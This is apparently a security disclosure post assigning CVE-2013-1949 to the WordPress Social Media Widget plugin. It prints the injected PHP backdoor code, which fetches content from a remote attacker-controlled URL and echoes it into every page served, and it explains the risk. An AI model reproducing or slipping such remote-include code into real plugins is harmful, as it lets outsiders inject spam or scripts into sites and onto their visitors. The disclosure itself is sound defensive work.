http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/ http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation So the company responsible for Social Media Widget claims that a rogue developer they contracted inserted this code: 470 471 $smw_url = "hxxp://i.aaur.net/i.php"; 472 if(!function_exists("smw_get")){ 473 function smw_get($f) { 474 $response = wp_remote_get( $f ); 475 if( is_wp_error( $response ) ) { 476 function smw_get_body($f) { 477 $ch = @curl_init(); 478 @curl_setopt($ch, CURLOPT_URL, $f); 479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 480 $output = @curl_exec($ch); 481 @curl_close($ch); 482 return $output; 483 } 484 echo smw_get_body($f); 485 } else { 486 echo $response["body"]; 487 } 488 } 489 smw_get($smw_url); 490 } Regardless of HOW this code got into the plugin it represents a significant security issue. Any site using this plugin is pulling "hxxp://i.aaur.net/i.php" and including it in the page they generate and send to a user. This opens up a huge can of worms, anyone that can man in the middle your server can now inject PHP into your blog, ot anything sent to the clients/etc. Please use CVE-2013-1949 for this issue.